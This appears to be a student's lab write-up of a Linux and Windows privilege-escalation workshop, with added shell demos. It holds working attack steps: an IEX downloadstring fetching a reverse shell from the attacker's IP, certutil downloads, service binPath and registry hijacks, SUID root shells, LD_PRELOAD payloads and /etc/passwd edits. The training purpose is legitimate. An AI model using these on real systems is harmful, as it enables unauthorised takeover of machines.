Practising Privilege Escalation (sagishahar lpeworkshop)

Link to exercise: https://github.com/sagishahar/lpeworkshop

                                                                       Linux

---------------------------------------------------------------------------------------

Questions: https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf

Scripts: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

 

 

Exercise 1 - Kernel

uname -a (check the kernel version, distro build and architecture)

use Google or searchsploit to check whether that exact kernel version has a public exploit (kernel exploits can crash the box, so match version and architecture carefully before running one, and prefer the other vectors below when they exist)

 

more info from LiveOverflow about Dirty COW (CVE-2016-5195):

https://www.youtube.com/watch?v=kEsshExn7aE&vl=en

 

 

Exercise 2 - Daemons

Basic recon: LinEnum, linuxprivchecker, LinPEAS, Linux Exploit Suggester and pspy (pspy shows other users' processes and cron jobs without needing root)

then check the version of each running service (ps aux, netstat -tulpn) against searchsploit

 

 

Exercise 6 - Sudo (Shell Escape Sequences)

sudo -l, then look up every allowed binary on GTFOBins (the "sudo" section of each entry) for a shell escape

 

 

Exercise 7 - Sudo (Abusing Intended Features)

if an allowed binary is not on GTFOBins, check what its intended options let you do as root: read or write arbitrary files (config, log or output paths), run hooks or helper programs, or leak file contents in error messages

 

 

Exercise 8 - Sudo (LD_PRELOAD)

only works when sudo -l shows env_keep+=LD_PRELOAD: the preloaded .so's constructor then runs as root before the allowed program starts

more info:

https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
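Exercises 6 to 8 all start from the same sudo -l output. The snippet below is an added example (not from the workshop or the linked pages) that pulls out of a sudo -l listing what you would otherwise read by hand: the commands allowed, which of them need no password, and whether LD_PRELOAD survives env_reset. The listing, host and user name in it are constructed.

```shell
#!/bin/sh
# Added example: triage a "sudo -l" listing. SUDO_L_SAMPLE is constructed
# (not captured from the workshop VM); on a real box save sudo -l output and
# pass its contents to these functions.

SUDO_L_SAMPLE='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/nano
    (ALL) ALL'

# One allowed command per line, with the "(runas)" and tag prefixes stripped.
sudo_allowed_commands() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { in_cmds = 1; next }
        in_cmds && /^[[:space:]]*\(/ {
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")     # drop "(root)" / "(ALL)"
            while (sub(/^[A-Z]+:[[:space:]]*/, "")) { }      # drop NOPASSWD:, SETENV:, ...
            print
        }'
}

# Commands that will not prompt for a password (usable from a non-interactive shell).
sudo_nopasswd_commands() {
    printf '%s\n' "$1" | awk '/^[[:space:]]*\(.*NOPASSWD:/ {
        sub(/.*NOPASSWD:[[:space:]]*/, ""); print }'
}

# True when env_keep lets LD_PRELOAD through env_reset (exercise 8 precondition).
sudo_keeps_ld_preload() {
    printf '%s\n' "$1" | grep -q 'env_keep+=.*LD_PRELOAD'
}

# GTFOBins entry to read for an allowed binary (exercise 6).
gtfobins_url() {
    printf 'https://gtfobins.github.io/gtfobins/%s/\n' "$(basename "$1")"
}
```

Note that secure_path is also worth reading: with it set, the PATH tricks from the cron exercises below do not apply to sudo-run commands, which is why the function-name and LD_PRELOAD routes matter here.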

 

 

Exercise 9 - NFS

mount the export on your own box; if it was exported with no_root_squash, root on your machine stays root on the share, so you can chown a copy of bash to root and set the SUID bit on it there, then run it on the target (with root_squash, the default, your root is mapped to nobody and this does not work)
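An added example, not from the page or the workshop: a check over the target's /etc/exports (or what showmount -e reports) for the no_root_squash option that makes this work, followed by the steps that exploit a hit. The exports file is constructed, and the mount point and file names in the comments are assumed.

```shell
#!/bin/sh
# Added example: spot exports that do not squash root. EXPORTS_SAMPLE is a
# constructed /etc/exports; on a target, cat the real one over your foothold
# shell or compare with "showmount -e target" from your box.

EXPORTS_SAMPLE='/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(rw,sync,root_squash)
# backups are read-only and map everyone to nobody
/var/backups *(ro,all_squash)'

# Print "<export> <client>" for every client entry carrying no_root_squash.
nfs_no_root_squash() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || NF < 2 { next }
        {
            for (i = 2; i <= NF; i++) {
                split($i, parts, "(")               # client(opt,opt,...)
                n = split(parts[2], opts, /[,)]/)
                for (j = 1; j <= n; j++)
                    if (opts[j] == "no_root_squash") print $1, parts[1]
            }
        }'
}

# What follows a hit (assumed names: /mnt/nfs mount point, rootbash file).
# Copy the target's own bash from the target side, then fix ownership and set
# SUID from the attacker side as root, where root is not squashed:
#   target$   cp /bin/bash /tmp/rootbash
#   attacker# mount -o rw,vers=3 target:/tmp /mnt/nfs
#   attacker# chown root:root /mnt/nfs/rootbash && chmod u+s /mnt/nfs/rootbash
#   target$   /tmp/rootbash -p
# Using the target's own bash avoids libc or architecture mismatches.
```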

 

 

Exercise 10 - Cron (Path)

checking cronjobs: pspy, crontab -l, cat /etc/crontab, ls -la /etc/cron.d /etc/cron.*

checking whether the job is open to PATH hijacking: read the PATH= line at the top of /etc/crontab (cron uses that, not your shell's $PATH) and see whether any directory listed before the real binary's location is writable by you; LinPEAS reports this too
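An added example (not from the page or the workshop): the whole PATH hijack replayed in a scratch directory, using a constructed system crontab that mirrors the workshop layout (a user-owned directory first on cron's PATH, a job that calls overwrite.sh by bare name). Nothing runs as root; what it shows is where to read the PATH from and how the planted script gets picked up.

```shell
#!/bin/sh
# Added example: PATH hijack against a cron job, replayed locally. The crontab
# written below is constructed; the functions work on a real /etc/crontab too.

# The PATH= line cron applies to every job in that crontab file.
crontab_path() { sed -n 's/^PATH=//p' "$1" | head -n 1; }

# First directory in a colon-separated PATH that we can write to.
first_writable_dir() {
    _saved=$IFS; IFS=:
    for _d in $1; do
        if [ -d "$_d" ] && [ -w "$_d" ]; then
            IFS=$_saved; printf '%s\n' "$_d"; return 0
        fi
    done
    IFS=$_saved
    return 1
}

# Command part of each job line (system crontab: 5 time fields, user, command).
crontab_commands() {
    grep -v '^[A-Z_]*=' "$1" | grep -v '^#' | cut -d' ' -f7-
}

# Returns "hijacked" when the planted script ran in place of the job's command.
demo_cron_path_hijack() {
    work=$(mktemp -d)
    mkdir -p "$work/home/user" "$work/usr/bin"
    cat > "$work/crontab" <<EOF
PATH=$work/home/user:$work/usr/bin
* * * * * root overwrite.sh
EOF
    cron_path=$(crontab_path "$work/crontab")
    target=$(first_writable_dir "$cron_path") || { rm -rf "$work"; return 1; }
    job=$(crontab_commands "$work/crontab" | head -n 1)      # overwrite.sh
    # Plant a script with that exact name in the first writable PATH entry.
    # A real payload would copy /bin/bash and chmod +s it instead of echo.
    printf '#!/bin/sh\necho hijacked > "%s/proof"\n' "$work" > "$target/$job"
    chmod +x "$target/$job"
    # What cron does at the next minute: run the job with the crontab's PATH.
    env PATH="$cron_path" /bin/sh -c "$job" 2>/dev/null
    cat "$work/proof" 2>/dev/null
    rm -rf "$work"
}
```

On a real box the three checks are: crontab_path on /etc/crontab, first_writable_dir on that value, and whether the job's command is a bare name rather than an absolute path.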

 

more info on PATH hijacking:

https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

more info: check out ippsec's Nineveh video to write your own script that catches cron jobs as they run

https://www.youtube.com/watch?v=K9DKULxSBK4&t=1890s

 

 

Exercise 11 - Cron (Wildcards)

the shell expands * into the file names in the directory, so files named like options (--checkpoint=1 and --checkpoint-action=exec=sh shell.sh) get passed to tar as arguments and run your script; see the tar entry:

https://gtfobins.github.io/gtfobins/tar/
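To watch the wildcard injection fire, and to see what stops it, here is an added example that is not from the page or GTFOBins: it plants the two option-shaped file names in a scratch directory and runs a constructed backup job over them, vulnerable and hardened. It needs GNU tar (--checkpoint is a GNU extension) and runs entirely as your own user.

```shell
#!/bin/sh
# Added example: tar wildcard injection replayed locally. The "cron job" is a
# constructed backup script; nothing here runs as root.

is_gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# Plant the two option-shaped file names plus the payload script in $1.
plant_wildcard_payload() {
    printf '#!/bin/sh\necho pwned > "%s/proof"\n' "$1" > "$1/shell.sh"
    touch "$1/--checkpoint=1"
    touch "$1/--checkpoint-action=exec=sh shell.sh"
}

# Vulnerable job: cd into the dir and archive '*', so the planted names become
# tar options and the checkpoint action runs "sh shell.sh" during the archive.
run_vulnerable_backup() {
    ( cd "$1" && tar -cf "$1/backup.tar" * 2>/dev/null )
}

# Hardened job: './*' makes every expansion start with './', never '-'
# (ending the option list with '--' before the glob works the same way).
run_hardened_backup() {
    ( cd "$1" && tar -cf "$1/backup.tar" ./* 2>/dev/null )
}

# Returns "pwned" if the payload fired, "safe" otherwise. $1 = vulnerable|hardened
wildcard_demo() {
    work=$(mktemp -d)
    echo "important data" > "$work/data.txt"
    plant_wildcard_payload "$work"
    if [ "$1" = vulnerable ]; then
        run_vulnerable_backup "$work"
    else
        run_hardened_backup "$work"
    fi
    if [ -f "$work/proof" ]; then cat "$work/proof"; else echo safe; fi
    rm -rf "$work"
}
```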

 

 

Exercise 12 - Cron (File Overwrite)

bad perms

find world-writable files (then check whether any of them is a script a root cron job runs, and overwrite it with your payload)

find / -type f -perm -o+w ! -path "/proc/*" 2>/dev/null


Exercise 13 - File Permissions (Suid Binary - .so Injection)

SUID binaries that try to load a .so that does not exist: run them under strace -f -e trace=open,openat and look for ENOENT on a .so path; if that path is inside a directory you can write to, compile your own .so there (gcc -shared -fPIC) with a constructor that spawns a shell, then run the SUID binary again

 

 

Exercise 14 - File Permissions (Suid Binary -  Symlinks)

link a file you own -> a file owned by root (argument order is target first, then link name; the link has to live somewhere you can write):

ln -s /root/<root-owned file> /home/user/user_file

(a SUID binary that reads /home/user/user_file follows the link and reads the root-owned file for you)

for example, tar -cvf /home/user/backup.tar /home/user/user_file

(extract backup.tar with tar -xvf to get the contents; note that tar only follows the symlink when invoked with -h/--dereference, otherwise it stores the link itself, so check how the SUID program calls it)

 

more info: https://percussiveelbow.github.io/linux-privesc/

 

 

Exercise 15 and 16 - File Permissions (Environment Variables)

# strings execute_me: /usr/bin/service apache2 start

run strings on the SUID binary to see which command it executes (here an absolute path, so a PATH hijack will not work)

function /usr/bin/service() { whoami; }    <- define a bash function whose name is the full path (a real payload copies /bin/bash, does chmod +s on the copy and runs it with -p)

export -f /usr/bin/service    <- export the function into the environment, where the child shell picks it up

export -f    (with no name, lists the exported functions so you can check it is there)

caveat: this only works when the shell the binary spawns (system() uses /bin/sh) is bash, and an old one at that: bash 4.2-048 and later no longer let a function named like a file path stand in for the real program, and dash, the default /bin/sh on Debian and Ubuntu, ignores exported functions entirely

# strings execute_me2: service apache2 start

alternatively, for a relative command name either put a script called service first on PATH (PATH=/tmp:$PATH) or define and export the function the same way:

function service() { whoami; }
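The same trick as an added example, not the workshop's code, with the conditions it depends on made visible: the relative-name case, the absolute-path case, and what happens when the child shell is whatever /bin/sh is. No SUID binary is involved; bash -c and /bin/sh -c stand in for the system() call inside the binary, and /usr/local/bin/demo-service is an assumed path that does not exist on the box.

```shell
#!/bin/sh
# Added example for exercises 15/16: hijack the command a SUID binary runs
# through an exported bash function. The real payload would be
#   cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash && /tmp/rootbash -p
# in place of the echo used here.

# Exercise 15: the binary runs "service apache2 start" (relative name). A
# function called service is exported; the child bash imports it and calls it
# before PATH is even consulted.
hijack_relative_service() {
    bash -c '
        service() { echo "hijacked: $*"; }
        export -f service
        bash -c "service apache2 start"
    '
}

# Exercise 16: absolute path, so the function is named like the path (assumed
# path /usr/local/bin/demo-service, not a real program). Old bash (before
# 4.2-048) lets such a function replace the file; newer bash does not, in which
# case the real path is executed and, as it does not exist, the fallback reports it.
hijack_absolute_service() {
    bash -c '
        eval "function /usr/local/bin/demo-service() { echo \"hijacked: \$*\"; }" 2>/dev/null
        export -f /usr/local/bin/demo-service 2>/dev/null
        bash -c "/usr/local/bin/demo-service apache2 start" 2>/dev/null \
            || echo "not supported by this bash"
    '
}

# The shell system() spawns is /bin/sh. dash (Debian/Ubuntu default) ignores
# exported functions, so the real binary runs; only if /bin/sh is bash does the
# function win. A stand-in "service" script first on PATH shows which happened.
hijack_via_bin_sh() {
    work=$(mktemp -d)
    printf '#!/bin/sh\necho "real binary: $*"\n' > "$work/service"
    chmod +x "$work/service"
    out=$(PATH="$work:$PATH" bash -c '
        service() { echo "hijacked: $*"; }
        export -f service
        /bin/sh -c "service apache2 start"
    ')
    rm -rf "$work"
    printf '%s\n' "$out"
}

# How the export travels: an environment variable named after the function,
# which is what the child shell imports (and what dash leaves alone).
exported_function_env_name() {
    bash -c 'service() { :; }; export -f service; env' \
        | sed -n 's/^\(BASH_FUNC_service[^=]*\)=.*/\1/p' | head -n 1
}
```

Run hijack_via_bin_sh on the target itself before relying on this: "real binary" means the target's /bin/sh is not bash and the function route is closed, leaving the PATH route for relative names only.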

 

 

 

                     

                                                                 Windows

---------------------------------------------------------------------------------------

 

Exercise 2 - Services (DLL Hijacking)

DLL hijacking works by placing your own DLL in a writable directory on the service's DLL search path at a spot where the service tries to load a DLL that does not exist (Procmon shows the CreateFile result as "NAME NOT FOUND"); the next time the service starts it loads your DLL instead.

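Finding the missing library is the same job on both systems: filter a loader trace for lookups that failed, then keep the ones whose directory you can write to. This added example (not from the page or the workshop) does that for exercise 13 on Linux (strace output, .so files) and for this exercise on Windows (a Procmon CSV export, .dll files). Both trace samples are constructed, and the paths in them are illustrative.

```shell
#!/bin/sh
# Added example: pull hijack candidates out of loader traces. Both samples are
# constructed, not captured from the workshop VMs.

# strace -f -e trace=open,openat ./suid-binary 2>&1
STRACE_SAMPLE='open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/home/user/.config/libmissing.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/local/lib/libother.so.1", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3'

# Procmon "Save as CSV" with the default columns
PROCMON_SAMPLE='"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:00:01","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read"
"1:00:02","dllhijackservice.exe","1234","CreateFile","C:\Temp\hijackme.dll","NAME NOT FOUND","Desired Access: Read"
"1:00:03","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read"'

# Linux: .so paths the loader tried and did not find.
missing_so_from_strace() {
    printf '%s\n' "$1" | grep 'ENOENT' | sed -n 's/.*"\([^"]*\.so[^"]*\)".*/\1/p'
}

# Windows: .dll paths with result NAME NOT FOUND, in search order.
missing_dll_from_procmon() {
    printf '%s\n' "$1" | awk -F'","' '$6 == "NAME NOT FOUND" && tolower($5) ~ /\.dll$/ { print $5 }'
}

# Keep only candidates whose directory we can create files in (run on the box
# whose paths these are; stdin is one path per line).
writable_candidates() {
    while IFS= read -r p; do
        d=$(dirname "$p")
        if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$p"; fi
    done
}

# Next step on Linux: compile a library whose constructor drops a shell, e.g.
#   gcc -shared -fPIC -o /home/user/.config/libmissing.so inject.c
# with inject.c holding
#   __attribute__((constructor)) void init(void) { setuid(0); system("/bin/bash -p"); }
# then run the SUID binary. On Windows: a DLL whose DllMain runs the payload,
# copied to the first writable candidate, then the service is restarted.
```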

 

Kali:

Use nishang's invoke-powershelltcp.ps1:

https://github.com/samratashok/nishang


 

type this in PowerShell on the Windows box to fetch and run the script in memory (x.x.x.x is your Kali IP, x.ps1 the nishang script you are serving over HTTP):

IEX (new-object net.webclient).downloadstring('http://x.x.x.x/x.ps1')

 

use certutil.exe -urlcache -split -f <url> <file_name> to download a file to disk instead.

 

change the port at the bottom of the shell script to another port and listen on that port on Kali.

 

run start-service dllsvc so the service starts and loads your DLL.

 

instead of Procmon you can use PowerSploit's PowerUp module (Find-ProcessDLLHijack / Find-PathDLLHijack):

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

 

 

Exercise 3 - Services (binPath)

Replacing a service's binPath with your own command makes the service run that command instead of its executable when it starts (you need SERVICE_CHANGE_CONFIG on the service).

Check which services grant 'Everyone' write access to their configuration (accesschk.exe -uwcqv "Everyone" * lists them).

 

while doing exercise 3 I noticed that when I started daclsvc, it errored out.

but it still ran the command (to add the user to the admin group) anyway.
# sc config daclsvc binpath= "net localgroup administrators user /add"

 

After trying IEX and certutil, it didn't work, probably some encoding issue.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

when looking for more reverse shells I tried mshta, which seemed to work

more info:https://github.com/freshness79/HTA-Shell


 

 

Exercise 4 - Services (Unquoted Path)

Command: https://pentestlab.blog/2017/03/09/unquoted-service-path/


 

More info: https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae

Windows splits an unquoted path at every space and tries each prefix in turn (C:\Program.exe, then C:\Program Files\Unquoted.exe, and so on); the first file found wins, so the earliest directory on that chain you can write to is where your executable goes. Hence, in the workshop, the service ends up running common.exe first.
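An added example, not from the page or the linked posts: given an unquoted ImagePath, list the executables Windows will try before the real one, in the order it tries them. The paths below are constructed in the style of the workshop's services; on a real target feed it the PathName values from wmic service get name,pathname (or sc qc <service>) one at a time.

```shell
#!/bin/sh
# Added example: enumerate hijack candidates for an unquoted service path.
# The three sample paths are constructed.

SAMPLE_UNQUOTED='C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe'
SAMPLE_QUOTED='"C:\Program Files\Quoted Service\service.exe" -k svc'
SAMPLE_NO_SPACES='C:\Windows\system32\svchost.exe -k netsvcs'

# Print each prefix Windows tries (split at every space left of the .exe),
# earliest first. Prints nothing and returns 1 when the path is quoted or has
# no spaces, i.e. is not vulnerable.
hijack_candidates() {
    path=$1
    case $path in \"*) return 1 ;; esac                              # quoted
    exe=$(printf '%s\n' "$path" | sed 's/\.[Ee][Xx][Ee].*/.exe/')     # drop arguments
    case $exe in *' '*) ;; *) return 1 ;; esac                      # nothing to split
    rest=$exe
    prefix=''
    while :; do
        case $rest in
            *' '*) part=${rest%% *}; rest=${rest#* } ;;
            *) break ;;
        esac
        prefix="$prefix$part"
        printf '%s.exe\n' "$prefix"
        prefix="$prefix "
    done
}

# On the target, check each candidate's directory for write access
# (icacls "C:\Program Files\Unquoted Path Service"), drop your exe there under
# the candidate's name, and restart the service.
```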

 

 

Exercise 5 - Services (Registry)

 


Alternatively, you can use 'everyone allow  fullcontrol'


Command: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\common.exe /f

# change the service's ImagePath in the registry to point to your executable, then start the service

 

Exercise 6 - Services (Executable File)

Copy and paste the .exe into place rather than moving it: a moved file keeps the permissions it had, which the "File Permissions Service" cannot use, while a copy inherits the destination's.

 

All edited programs/code referenced from: https://github.com/sagishahar/lpeworkshop

Privilege Escalation: Library Hijacking

 

                                       Exploit cronjobs running python script

---------------------------------------------------------------------------------------

 

Python script:


 

since the script does import calendar, the module that actually executes is /usr/lib/python2.7/calendar.py (the location is in the Python docs, or check with python -c 'import calendar; print calendar.__file__'); this only helps because that file is writable here, which it never should be

 

append a reverse shell payload to the end of that file; module code runs on import, so it executes with the privileges of whatever runs the script (root, when root's cron runs it):

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

wait for the cron job to run the script, and the shell comes back:
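The same hijack generalises beyond a writable calendar.py: Python looks in the script's own directory before the standard library, so any writable entry that comes earlier on sys.path works for any module the script has not imported yet. This added example (not from the page) shows that variant with a constructed job and shadow module in a scratch directory, plus two checks worth running on a target: which file an import actually resolves to, and which sys.path entries you can write to. It needs python3 and runs as your own user.

```shell
#!/bin/sh
# Added example: the sys.path variant of the library hijack. The job script
# and the shadow module are constructed here; nothing runs as root.

has_python3() { command -v python3 >/dev/null 2>&1; }

# Absolute path of the file "import <module>" loads when run from directory $1.
resolved_module_file() {   # $1 directory, $2 module name
    ( cd "$1" && python3 -c "import $2, os; print(os.path.abspath($2.__file__))" )
}

# sys.path entries you can write to right now: each is a hijack point for
# every module that has not been imported yet when the victim script runs.
writable_sys_path() {
    python3 -c 'import os, sys
print("\n".join(p for p in sys.path if p and os.access(p, os.W_OK)))'
}

# Returns "hijacked" when the shadow module's code ran inside the job.
python_hijack_demo() {
    work=$(mktemp -d)
    # The victim: a job root would run from cron, living in a dir we can write to.
    cat > "$work/job.py" <<'EOF'
import calendar
print(calendar.month_name[1])
EOF
    # The shadow module dropped beside it; sys.path[0] is the script directory.
    cat > "$work/calendar.py" <<'EOF'
import os
# Runs at import time with the uid of whatever imports it; a real payload would
# spawn the reverse shell from the pentestmonkey cheat sheet here.
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "proof"), "w") as f:
    f.write("hijacked")
month_name = [""] + ["January"] * 12    # keep the job's own call from failing
EOF
    python3 "$work/job.py" >/dev/null 2>&1
    cat "$work/proof" 2>/dev/null || echo "not hijacked"
    rm -rf "$work"
}
```

The defensive reading is the same check in reverse: a script run by root should live in a root-owned directory and import only from root-owned paths, since every module on the chain executes on import.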

---------------------------------------------------------------------------------------

 

Stricter imports (from calendar import day_name instead of import calendar):

the script only binds the names it asks for, but the whole module file still runs on import, so code appended to calendar.py still executes. Through globals() you can see what the script imported:

 'day_name': <calendar._localized_day instance at 0x...>

---------------------------------------------------------------------------------------

 

Pivoting through different imports: if the module the script imports is not writable, look at what that module imports in turn (calendar itself does import datetime and locale); every module in the chain executes on import, so any writable one will do.

 

Privilege Escalation: priority of /etc/shadow and /etc/passwd

# making a password hash (crypt format, which is what the second field of /etc/passwd or /etc/shadow holds)

openssl passwd password   -> 1oCs2Y6GOzDm2

openssl passwd pass       -> mV.TZP57qoG6s

source: Editing /etc/passwd File for Privilege Escalation

---------------------------------------------------------------------------------------

 

 

# changing /etc/passwd: put the hash in root's second field in place of the x, i.e. root:1oCs2Y6GOzDm2:0:0:root:/root:/bin/bash (only possible when /etc/passwd is writable by you, which is the misconfiguration this relies on)

---------------------------------------------------------------------------------------

 

# /etc/shadow: root's entry has no usable hash (no login, the default)

# trying to log in as root with "password": success, because the hash in /etc/passwd was used and /etc/shadow was never consulted

---------------------------------------------------------------------------------------

 

# changing /etc/shadow: give root the hash for "pass" while /etc/passwd still holds the hash for "password"

Conclusion: /etc/passwd > /etc/shadow. If the second field of /etc/passwd holds a hash, that hash is used and /etc/shadow is ignored; /etc/shadow is only consulted when that field is "x". A writable /etc/passwd is therefore enough for root, whatever /etc/shadow says.
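The precedence rule the experiment shows, as an added example (not from the page) you can run against copies of the two files: which hash the login check will actually use for a given user, and the replacement passwd line. Both file contents below are constructed; the hash 1oCs2Y6GOzDm2 is the page's own crypt hash for "password", the shadow hash is a placeholder, and make_hash needs openssl.

```shell
#!/bin/sh
# Added example: which hash /etc/passwd vs /etc/shadow resolves to, and the
# passwd line to write. PASSWD_SAMPLE and SHADOW_SAMPLE are constructed.

PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
bob:1oCs2Y6GOzDm2:1001:1001::/home/bob:/bin/bash
alice:x:1002:1002::/home/alice:/bin/bash'

SHADOW_SAMPLE='root:$6$constructed$notarealhash:18000:0:99999:7:::
alice:!:18000:0:99999:7:::'

# The hash that gets checked for user $1: the second field of passwd, unless it
# is "x", in which case shadow is consulted. $2 = passwd contents, $3 = shadow contents.
effective_hash() {
    pw=$(printf '%s\n' "$2" | awk -F: -v u="$1" '$1 == u { print $2; exit }')
    if [ "$pw" = "x" ]; then
        printf '%s\n' "$3" | awk -F: -v u="$1" '$1 == u { print $2; exit }'
    else
        printf '%s\n' "$pw"
    fi
}

# passwd contents with user $1's second field replaced by hash $2 (the edit the
# page makes to root's line). $3 = passwd contents.
passwd_line_with_hash() {
    printf '%s\n' "$3" | awk -F: -v OFS=: -v u="$1" -v h="$2" '$1 == u { $2 = h } { print }'
}

# A hash the way the page makes one. A fixed salt is used here so the result is
# reproducible; -1 is md5crypt, which every glibc accepts (plain DES crypt,
# the openssl default, truncates passwords to 8 characters).
make_hash() { openssl passwd -1 -salt rU7k "$1"; }
```

On a target the two checks are whether /etc/passwd is writable (ls -l /etc/passwd) and, if it is, that root's second field is currently "x": once you replace it, su root with your chosen password works regardless of what /etc/shadow holds.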